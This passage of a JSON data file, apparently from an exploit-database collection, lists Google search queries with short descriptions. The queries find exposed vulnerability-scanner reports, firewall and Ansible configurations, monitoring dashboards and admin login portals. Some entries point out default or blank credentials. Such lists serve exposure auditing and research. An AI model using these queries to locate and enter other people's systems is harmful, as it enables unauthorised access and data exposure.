Maldonado http://www.caceriadespammers.com.ar"}, {"dork": "inurl:ipf.conf -intext:ipf.conf ext:conf", "description": "IP Filter is software that provides packet filtering capabilities on a\nSolaris system. On a properly setup system, it can be used to build a\nfirewall. ipf.conf is the firewall configuration file which can be exposed\nto view the ip filter rules set up on the device.\nAyushman Dutta\nUniversity of Houston"}, {"dork": "intitle:\"Nessus Scan Report\" ext:html", "description": "Finds reports left behind by Nessus (vulnerability scanner)\nDxtroyer"}, {"dork": "\"[boot loader]\" \"WINNT\" ext:ini", "description": "Finds boot.ini files, showing you what operating systems are running on the server\nDxtroyer"}, {"dork": "intitle: \"Generated by Acunetix WVS Reporter\"", "description": "intitle: \"Generated by Acunetix WVS Reporter\"\r\n\r\nFinds reports left behind by Acunetix (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intitle:\"Burp Scanner Report\" | \"Report generated by Burp Scanner\"", "description": "intitle:\"Burp Scanner Report\" | \"Report generated by Burp Scanner\"\r\n\r\nFinds reports left behind by Burp Scanner (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intitle:\"netsparker scan report\" ext:pdf", "description": "intitle:\"netsparker scan report\" ext:pdf\r\n\r\nFinds reports left behind by Netsparker (vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "\"IBM Security AppScan Report\" ext:pdf", "description": "\"IBM Security AppScan Report\" ext:pdf\r\n\r\nThis dork show results that was created by IBM Security AppScan Standard\r\n\r\nManhNho"}, {"dork": "\":: Arachni Web Application Security Report\"", "description": "\":: Arachni Web Application Security Report\"\r\n\r\nFinds reports left behind by Arachini (web vulnerability scanner)\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by Nibbleblog\"", "description": "Finding blogs that are powerded by the Nibbleblog CMS.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:\"Statistics Report for HAProxy\" + \"statistics report for pid\"", "description": "intitle:\"Statistics Report for HAProxy\" + \"statistics report for pid\"\r\n\r\nStatistics Report for HAProxy\r\n\r\nManhNho"}, {"dork": "inurl:/munin/localdomain/localhost.localdomain/open_files.html", "description": "Search for the page that generated by Munin, this page will contains the\r\nsensitive information on the systems & application."}, {"dork": "inurl:\"AllItems.aspx?FolderCTID=\" \"firewall\" | \"proxy\" | \"configuration\" | \"account\"", "description": "IT infrastructure documents, device configuration and documentation and\r\nother juicy info.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"index of /ups.com/WebTracking\"", "description": "*Google* dork description: Emotet infected domains. Emotet is a banking\r\ntrojan malware program which\r\nobtains financial information by injecting computer code\r\n into the networking stack\r\n of an infected computer\r\n\r\n*Google Search: *\"index of /ups.com/WebTracking\"\r\n\r\n*Submitted by:* Alfie\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Malware Analysis Report\"", "description": "intitle:\"Malware Analysis Report\"\r\nThis dork show many report Malware Analysis of organization.\r\n\r\nKhanhNNVN"}, {"dork": "\"ansible.log\" | \"playbook.yaml\" | \".ansible.cfg\" | \"playbook.yml\" | host.ini intitle:\"index of\"", "description": "Target's system configuration, networks, etc...\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:ZAP Scanning Report Summary of Alerts ext:html", "description": "intext:ZAP Scanning Report Summary of Alerts ext:html\r\n\r\nThis Google Dork discovers badly configured servers exposing sensitive \r\nOWASP ZAP reports.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "inurl:department intext:\"hardware inventory\" firewall router ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw )", "description": "Hardware information, mainly firewall and routers.\r\nChange the words to fit your needs.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/scripts/wgate", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n++ SAP ITS System Information ++\r\n\r\ninurl:/scripts/wgate\r\n- Potential for RFC exploit to extra valuable data\r\n- Potential theft of username and password\r\n- Potential creation of SAP_ALL privilege users\r\n- Potential vulnerable to RFC callback\r\n- 1 Vulnerabillites on Exploit DB available for SAP its at the time of writing\r\n- Source and explanation for the Exploit:\r\n - https://securityaffairs.co/wordpress/71908/security/sap-configuration-flaw.html\r\n- 386 results at the time of writing\r\n\r\nDISCLAIMER:\r\n(The vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system)\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:nagios/cgi-bin/status.cgi", "description": "Exploit Title: Nagios monitor data\r\nGoogle dork: inurl:nagios/cgi-bin/status.cgi\r\nDate:2/8/2019\r\nExploit author: techjohnny"}, {"dork": "allinurl:\"/SilverStream/Meta/\"", "description": "Category : Advisories and Vulnerabilities\r\n\r\nDescription : Dork for finding to disclose data from websites which uses\r\nSilverStream software. It is a web services-oriented applications.\r\n\r\nBelow are the list of Vulnerability Multiple data disclose\r\n- silver stream server live statistic of time, memory status, session,\r\nlicense, and more\r\n- Current sessions details of the users who logged in in websites\r\n- Software License key also can find setup of VM to download application\r\n- Access to Silveradmin.jar file which administer the SilverStream Server\r\n- Database name disclose as well as version, Table, columns names etc\r\n- Admin data\r\n- And So on....\r\n\r\nBelow are few more option available to get data you can play around on URL\r\n/SilverStream/ :-\r\n\r\nAdministration\r\nClasses\r\nClusterAdmin\r\nDownloads\r\nErrorLogs\r\nFullTextIndexer\r\nListeners\r\nLogin\r\nLogout\r\nMeta\r\nObjectstore\r\nPages\r\nPermissions\r\nRenamer\r\nResources\r\nSecurity\r\nSessions\r\nStatistics\r\nTimestamps\r\nVersionCheck\r\n\r\nDork : allinurl:\"/SilverStream/Meta/\"\r\n\r\nDate : 10/2/2019\r\n\r\nAuthor : Manish Bhandarkar\r\nBlog : https://hackingforsecurity.blogspot.com/"}, {"dork": "s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo", "description": "Find DHCP and router logs stored on AWS s3 bucket\r\n\r\n# Google Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:apollo\r\n# Date: [30-7-2019]\r\n# Dork Author: [Mohammed*_*]\r\n\r\nEndless OS logs\r\n\r\nGoogle Dork: s3 site:amazonaws.com intext:dhcp filetype:txt inurl:endlessos"}, {"dork": "intitle:prometheus time series collection and processing server inurl:/alerts", "description": "Finding prometheus dashboards\r\n\r\nDorks:\r\nintitle:prometheus time series collection and processing server inurl:/alerts\r\nintitle:prometheus time series collection and processing server inurl:/targets\r\n\r\n# Date: [14-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:Host Report inurl:ganglia", "description": "Ganglia Dashboard (monitoring tool for computing systems, clusters and\r\nnetwork)\r\n\r\n# Google Dork: intitle:Host Report inurl:ganglia\r\n# Date: [20-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:\"/Serviceability?adapter=device.statistics.configuration\"", "description": "Google Dork: inurl:\"/Serviceability?adapter=device.statistics.configuration\"\r\n\r\nCategory: Configuration File Exposure (OWASP TOP 10(2017) A3-Sensitive Data\r\nExposure)\r\n\r\nDescription: It exposes control panel configuration file which contains\r\nwhole network configuration and internal logs of CISCO IP phones.\r\n\r\nAuthor Name: Harsha Deepa"}, {"dork": "inurl:zabbix/zabbix.php", "description": "Zabbix monitoring dashboard\r\n\r\n# Google Dork: \r\ninurl:zabbix/zabbix.php\r\ninurl:zabbix/hosts.php\r\n\r\n# Date: [28-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"OpenNMS web console\" inurl:opennms/index.jsp", "description": "OpenNMS network monitoring dashboard login pages\r\n\r\n# Google Dork: intitle:\"OpenNMS web console\" inurl:opennms/index.jsp\r\n# Date: [28-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"Dashboards\" AND inurl:\"/zabbix/zabbix.php?action=dashboard.list\"", "description": "This dork provide more specific result in google searching and possibly allow view dashboard with guest login."}, {"dork": "intitle:\"Cacti\" AND inurl:\"/monitor/monitor.php\"", "description": "# Dork #\r\n\r\nintitle:\"Cacti\" AND inurl:\"/monitor/monitor.php\"\r\n\r\nThis dork possibly allow to view monitoring device status in Cacti."}, {"dork": "intitle:\"netdata dashboard\" AND intext:\"Costa Tsaousis\"", "description": "# Dork #\r\n\r\nintitle:\"netdata dashboard\" AND intext:\"Costa Tsaousis\"\r\n\r\nThis dork possibly allow to view dashboard."}, {"dork": "intitle:Grapher AND inurl:sensorlist.htm", "description": "# Dork #\r\n\r\nintitle:Grapher AND inurl:sensorlist.htm\r\n\r\nThis dork possibly allow to view network status without authentication."}, {"dork": "intitle:traefik inurl:8080/dashboard", "description": "Traefik Dashboard\r\n\r\n# Google Dork: intitle:traefik inurl:8080/dashboard\r\n# Date: [24-3-2020]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:\"Nikto Report\" \"OSVDB\"", "description": "# Google Dork: intitle:\"Nikto Report\" \"OSVDB\"\r\n\r\n# Description: Find reports generated by the Nikto vulnerability scanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"Skipfish - scan results browser\"", "description": "# Google Dork: intitle:\"Skipfish - scan results browser\"\r\n\r\n# Description: Find reports generated by Skipfish vulnerability scanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "-site:\"pentest-tools.com\" intext:\"Scan coverage information\" AND \"List of tests\" ext:PDF", "description": "# Google Dork: -site:\"pentest-tools.com\" intext:\"Scan coverage information\"\r\nAND \"List of tests\" ext:PDF\r\n\r\n# Description: Find reports generated by Pentest-Tools.com vulnerability\r\nscanner.\r\n\r\n# Author: Carlos Ram\u00edrez L. (BillyV4)"}, {"dork": "intitle:\"ZAP Scanning Report\" + \"Alert Detail\"", "description": "# Google Dork: intitle:\"ZAP Scanning Report\" + \"Alert Detail\"\r\n\r\n# Network or Vulnerability data.\r\n\r\n# Date: 1/07/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"routeros\" \"sophia\"", "description": "# Google Dork: intitle:\"routeros\" \"sophia\"\r\n\r\n# Date: 22/07/2021 \r\n\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"jaeger UI\" inurl:trace", "description": "# Google Dork: intitle:\"jaeger UI\" inurl:trace\r\n# Date: 21/06/2021\r\n# Network or Vulnerability Data\r\n# Author: Mohammed*_*"}, {"dork": "intitle:\"NETSurveillance WEB\"", "description": "# Google Dork: intitle:\"NETSurveillance WEB\"\r\n# Network or Vulnerability Data\r\n# Date:18/07/2021\r\n# Exploit Author: J. Igor Melo"}], "Pages Containing Login Portals": [{"dork": "intitle:\"MikroTik RouterOS Managing Webpage\"", "description": "This is the front page entry point to a \"Mikro Tik\" Router."}, {"dork": "inurl:metaframexp/default/login.asp | intitle:\"Metaframe XP Login\"", "description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."}, {"dork": "inurl:\"webadmin\" filetype:nsf", "description": "This is a standard login page for Domino Web Administration."}, {"dork": "intitle:\"Dell Remote Access Controller\"", "description": "This is the Dell Remote Access Controller that allows remote administration of a Dell server."}, {"dork": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", "description": "This is the main authentication screen for the ZyXEL Prestige Router."}, {"dork": "filetype:php inurl:\"webeditor.php\"", "description": "This is a standard login portal for the webadmin program."}, {"dork": "inurl:/cgi-bin/sqwebmail?noframes=1", "description": "sQWebmail login portals."}, {"dork": "filetype:cfg login \"LoginServer=\"", "description": "This one finds login servers for the Ultima Online game."}, {"dork": "intitle:\"please login\" \"your password is *\"", "description": "These administrators were friendly enough to give hints about the password."}, {"dork": "intitle:\"ITS System Information\" \"Please log on to the SAP System\"", "description": "Frontend for SAP Internet Transaction Server webgui service."}, {"dork": "intitle:Novell intitle:WebAccess \"Copyright *-* Novell, Inc\"", "description": "search to show online Novell Groupwise web access portals."}, {"dork": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "description": "this search will get you on the web administration portal of linux open exchange servers."}, {"dork": "intitle:\"Virtual Server Administration System\"", "description": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus."}, {"dork": "\"OPENSRS Domain Management\" inurl:manage.cgi", "description": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus."}, {"dork": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", "description": "Postfix Admin login pages. Duh."}, {"dork": "intitle:\"phpPgAdmin - Login\" Language", "description": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services"}, {"dork": "inurl:/webedit.* intext:WebEdit Professional -html", "description": "WebEdit is a content management system. This is the login portal search."}, {"dork": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "description": "Administration pages for CUPS, The Common UNIX Printing System. Most are password protected."}, {"dork": "intext:\"Mail admins login here to administrate your domain.\"", "description": "Another way to locate Postfix admin logon pages."}, {"dork": "intitle:Group-Office \"Enter your username and password to login\"", "description": "Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online."}, {"dork": "intitle:\"welcome to netware *\" -site:novell.com", "description": "Novell login portals offering various services storage, printing, email or LDAP access"}, {"dork": "intitle:opengroupware.org \"resistance is obsolete\" \"Report Bugs\" \"Username\" \"password\"", "description": "Open groupware is a comprehensive open source groupware project running on all major platforms."}, {"dork": "intitle:\"Kurant Corporation StoreSense\" filetype:bok", "description": "These are Kurant StoreSense admin logon pages."}, {"dork": "intitle:\"SuSE Linux Openexchange Server\" \"Please activate JavaScript!\"", "description": "Another way to find the web administration portal of linux open exchange servers."}, {"dork": "inurl:\"suse/login.pl\"", "description": "More Suse login portals, mostly Open Exchange."}, {"dork": "inurl:webmail./index.pl \"Interface\"", "description": "Webmail system which reveals that the website is hosted by vDeck"}, {"dork": "ext:cgi intitle:\"control panel\" \"enter your owner password to continue!\"", "description": "Free Perl Guestbook (FPG) administration page. Only a password is needed to logon."}, {"dork": "intitle:\"ListMail Login\" admin -demo", "description": "Listmail mailinglist manager admin logon"}, {"dork": "intitle:asterisk.management.portal web-access", "description": "VOXBOX Asterisk web management. Allows to manage Asterisk configuration like calls and SIP settings."}, {"dork": "intitle:\"Flash Operator Panel\" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists", "description": "Flash Operator Panel is a switchboard type application for the Asterisk PBX. It runs on a web browser with the flash plugin. It is able to display information about your PBX activity in real time."}, {"dork": "intitle:\"inc. vpn 3000 concentrator\"", "description": "This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief."}, {"dork": "intext:\"vbulletin\" inurl:admincp", "description": "vBulletin Admin Control Panel"}, {"dork": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "description": "some version of ilohamail are vulnerable."}, {"dork": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "description": "Real Estate software package, with the admin login screen"}, {"dork": "intitle:\"WorldClient\" intext:\"\u00a9 (2003|2004) Alt-N Technologies.\"", "description": "MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs."}, {"dork": "site:*/lost_pass.php", "description": "Login portal:\r\n\r\nsite:*/lost_pass.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl::2082/frontend -demo", "description": "This allows you access to CPanel login dialogues/screens."}, {"dork": "inurl:Citrix/MetaFrame/default/default.aspx", "description": "MetaFrame Presentation Server"}, {"dork": "inurl:/SUSAdmin intitle:\"Microsoft Software Update Services\"", "description": "Microsoft SUS Server is a Patch Management Tool for Windows 2000, XP and 2003 systems.It can be used to gain access to a Patch Deployment server. If you successfully login to that server you can possibly compromise all the other network servers."}, {"dork": "inurl:exchweb/bin/auth/owalogon.asp", "description": "Outlook Web Access Login POrtal"}, {"dork": "inurl:textpattern/index.php", "description": "Login portal for textpattern a CMS/Blogger tool."}, {"dork": "\"This section is for Administrators only. If you are an administrator then please\"", "description": "Nothing special, just one more set of login pages, but the \"Administrators only\" line is a classic."}, {"dork": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "description": "Pretty standered login pages, they all have various differences but it appears that they use the same script or software."}, {"dork": "intitle:\"AlternC Desktop\"", "description": "This finds the login page for AlternC Desktop I dont know what versions."}, {"dork": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "description": "This finds all versions of the inspanel login page."}, {"dork": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "description": "This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork."}, {"dork": "inurl:csCreatePro.cgi", "description": "Create Pro logon pages."}, {"dork": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "description": "iCMS - Content Management System...Create websites without knowing HTML or web programming."}, {"dork": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "description": "qmail mail admin login pages.There are several vulnerabilities relating to this software"}, {"dork": "intitle:\"web-cyradm\"|\"by Luc de Louw\" \"This is only for authorized users\" -tar.gz -site:web-cyradm.org -johnny.ihackstuff", "description": "Web-cyradm is a software that glues topnotch mailing technologies together. The focus is on administrating small and large mailing environments.Web-cyradm is used by many different users. At the low end this are homeusers which are providing mailadresses to their family. On the mid to top end users are SME enterprises, educational and other organizations.The software on which web-cyradm relies on is completely free and opensource software. So you get the maximung flexibility which the lowest TCO."}, {"dork": "\"You have requested to access the management functions\" -.edu", "description": "Terracotta web manager admin login portal."}, {"dork": "\"Please authenticate yourself to get access to the management interface\"", "description": "Photo gallery managment system login"}, {"dork": "intext:\"Master Account\" \"Domain Name\" \"Password\" inurl:/cgi-bin/qmailadmin", "description": "There seems to be several vulns for qmail."}, {"dork": "inurl:/modcp/ intext:Moderator+vBulletin", "description": "there have been several dorks for vBulletin, but I could not find one in the search that targets the moderators control panel login page - this search targets versions 3.0 onwards."}, {"dork": "intitle:\"i-secure v1.1\" -edu", "description": "I-Secure Login Pages"}, {"dork": "intitle:\"Login to the forums - @www.aimoo.com\" inurl:login.cfm?id=", "description": "Aimoo Login Pages. \"Looking for a free message board solution? Aimoo provides one of the most powerful, feature rich, community based forum services available!\""}, {"dork": "intitle:\"EXTRANET * - Identification\"", "description": "WorkZone Extranet Solution login page. All portals are in french or spanish I belive."}, {"dork": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "description": "This search finds many different Extranet login pages."}, {"dork": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "description": "HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment."}, {"dork": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "description": "Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability."}, {"dork": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "description": "iLo and related login pages !? Whoops.."}, {"dork": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "description": "Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login."}, {"dork": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "description": "sift Group makes a web site administration product which can be accessed via a web browser. This dork locates their admin login."}, {"dork": "intitle:\"b2evo > Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\" -demo -site:b2evolution.net", "description": "b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login."}, {"dork": "\"Emergisoft web applications are a part of our\"", "description": "Hospital patient management system, in theory it could be dangerous."}, {"dork": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "description": "betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins."}, {"dork": "intitle:Ovislink inurl:private/login", "description": "Ovislink vpn login page."}, {"dork": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "description": "Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up."}, {"dork": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "description": "The page to change admin passwords. Minor threat but the place to start an attack."}, {"dork": "intitle:\"EZPartner\" -netpond", "description": "EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins."}, {"dork": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg", "description": "RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer."}, {"dork": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "description": "This dork finds firewall/vpn products from fiber logic. They only require a one-factor authentication."}, {"dork": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp -\"Response.Buffer = True\" -javascript", "description": "Ecommerce templates makes a online shopping cart solution. This search finds the admin login."}, {"dork": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url."}, {"dork": "inurl:\"php121login.php\"", "description": "\"PHP121 is a free web based instant messenger - written entirely in PHP. This means that it will work in any browser on any operating system including Windows and Linux, anywhere!\""}, {"dork": "intitle:(\"TrackerCam Live Video\")|(\"TrackerCam Application Login\")|(\"Trackercam Remote\") -trackercam.com", "description": "\"TrackerCam\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is a software application that lets you put your webcam on the web, use it for surveillance, and do things like access its video from a cell phone or upload its images to an FTP-server.\""}, {"dork": "(intitle:\"Please login - Forums powered by WWWThreads\")|(inurl:\"wwwthreads/login.php\")|(inurl:\"wwwthreads/login.pl?Cat=\")", "description": "\"WWWthreads is a high powered, full scalable, customizable open source bulletin board package that you will be able to modify to your specific topics, users, and needs. WWWthreads has an extremely comprehensive interface, a very simple administration panel for quick set up and management, as well as a frequently asked questions to help guide you through the process should you hit any snags or have any questions.\""}, {"dork": "(intitle:\"rymo Login\")|(intext:\"Welcome to rymo\") -family", "description": "\"rymo is a small but reliable webmail gateway. It contacts a POP3-server for mail reading and uses the PHP-internal mail functions for mail sending.\""}, {"dork": "intitle:\"Employee Intranet Login\"", "description": "Intranet login pages by decentrix.com"}, {"dork": "inurl:\"/slxweb.dll/external?name=(custportal|webticketcust)\"", "description": "Customer login pages\"SalesLogix is the Customer Relationship Management Solution that drives sales performance in small to Medium-sized businesses through Sales, Marketing, and Customer Support automation and back-officeintegration.\""}, {"dork": "\"SquirrelMail version\" \"By the SquirrelMail Development Team\"", "description": "More SquirrelMail Logins"}, {"dork": "(intitle:\"Please login - Forums powered by UBB.threads\")|(inurl:login.php \"ubb\")", "description": "Logins for Forums powered by UBB.threads"}, {"dork": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url."}, {"dork": "intitle:ARI \"Phone System Administrator\"", "description": "Login page for \"Asterisk Recording Interface\" (ARI)."}, {"dork": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "description": "IBM e-server's login pages.\nAuthor: DigiP"}, {"dork": "inurl:/dana-na/auth/", "description": "Juniper SSL\nAuthor: bugbear"}, {"dork": "inurl:src/login.php", "description": "Locates SquirrelMail Login Pages\nAuthor: 0daydevilz"}, {"dork": "\"Login Name\" Repository Webtop intitle:login", "description": "Search for login screen of default instance: Documentum Webtop by EMC"}, {"dork": "\"Welcome to Sitecore\" + \"License Holder\"", "description": "Sitecore CMS detection."}, {"dork": "Please-logon \"intitle:zarafa webaccess \"", "description": "Zarafa Webaccess logon pages.\nGreetings,\nAlrik."}, {"dork": "inurl:phpliteadmin.php", "description": "The default password is 'admin'"}, {"dork": "you really should fix this security hole by setting a password for user '.root'. inurl:/phpmyadmin intitle:localhost", "description": "Gives sites with default username root and no password\n-- \nnitish mehta"}, {"dork": "allintext: \"Please login to continue...\" \"ZTE Corporation. All rights reserved.\"", "description": "Reported by: Jasper Briels"}, {"dork": "intitle:\"VNC Viewer for Java\"", "description": "VNC Viewer for Java\n~4N6 Security~"}, {"dork": "\"Welcome to phpMyAdmin\" + \"Username:\" + \"Password:\" + \"Language:\" + \"Afrikaans\"", "description": "Finds cPanel login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "inurl:5000/webman/index.cgi", "description": "Synology nas login"}, {"dork": "intitle:\"Internet Security Appliance\" & intext:\"Enter Password and click Login\"", "description": "#Summary: ZyWall Firewall login portal\n#Category: Various Online Devices\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Login - OTRS\" inurl:pl", "description": "#Summary: OTRS login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"WebMail | Powered by Winmail Server - Login\" & (intext:\"Username\" & intext:\"Password\")", "description": "#Summary: Winmail login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:8080 intitle:\"login\" intext:\"UserLogin\" \"English\"", "description": "#Summary: VoIP login portals\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"::: Login :::\" & intext:\"Customer Login\" & \"Any time & Any where\"", "description": "#Summary: Surveillance login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:phpmyadmin/index.php & (intext:username & password & \"Welcome to\")", "description": "#Summary: PHP Admin login portals\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:\"/module.php/core/loginuserpass.php\"", "description": "Finds SimpleSAMLphp login pages.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:Admin inurl:login.php site:.co.in", "description": "dork submitted by M4RKM3N aka Osama Mahmood\nrevels admin login panels of sites :)"}, {"dork": "inurl:typo3/install/index.php?mode=", "description": "typo3 install logins\nBruno Schmid"}, {"dork": "intitle:\"Zimbra Web Client Sign In\"", "description": "Open Source Zimbra Webmail Login pages"}, {"dork": "intitle:\"Zimbra Web Client Log In\"", "description": "Open Source Zimbra Webmail Login pages"}, {"dork": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "description": "via Priyal Viroja"}, {"dork": "inurl:Citrix/MetaframeXP", "description": "Servers Citrix web xD.\nBy Rootkit."}, {"dork": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "description": "Type: login portals\nAuthor : botsec0"}, {"dork": "intitle:IBM Lotus iNotes Login", "description": "Thanks,\nXploit"}, {"dork": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "description": "Oracle PeopleSoft Sign-in\nLogins\n-Xploit"}, {"dork": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "description": "Login for Parallels Plesk Panel for Microsoft Windows\n-Xploit"}, {"dork": "inurl:/my.logon.php3?", "description": "f5 Network Remote Access Logins\n-Xploit"}, {"dork": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "description": "Patient Health Portals.\nDecoy"}, {"dork": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "description": "Content Manager Login Pages.\nDecoy"}, {"dork": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "description": "Login for SmarterMail Enterprise\n-Xploit"}, {"dork": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "description": "Blackboard Login Portals.\nDecoy"}, {"dork": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "description": "Canvas login portals.\nDecoy"}, {"dork": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "description": "WinOcular Workspace Login portals.\nDecoy"}, {"dork": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php\n| inurl:.us/wp-login.php"}, {"dork": "intitle:AP Router New Generation | inurl:/home.asp", "description": "Access Point Router Logins\n-Xploit"}, {"dork": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "description": "Numara Software FootPrints Logins\n-Xploit"}, {"dork": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "description": "Roundcube Webmail Login Portals.\nDecoy"}, {"dork": "intitle:\"Mail - AfterLogic WebMail\"", "description": "AfterLogic WebMail Login Portals.\nDecoy"}, {"dork": "intitle:\"Lost Password Reset\" | inurl:/secure/pwreset.php | inurl:/portal/index.php", "description": "Lost Password Reset for Websites.\n-Xploit"}, {"dork": "intitle:\"Microsoft+Outlook+Web+Access+Log+On\" | inurl:/owa/auth/logon.aspx", "description": "Microsoft Outlook Web Logins \n-Xploit"}, {"dork": "ext:html intext:Airties inurl:login.html", "description": "AirTies Modems\next:html intext:Airties inurl:login.html\natawho-sonadam"}, {"dork": "inurl:/welcome.cgi? | p=no-cert", "description": "Another Dork with Remote Logins 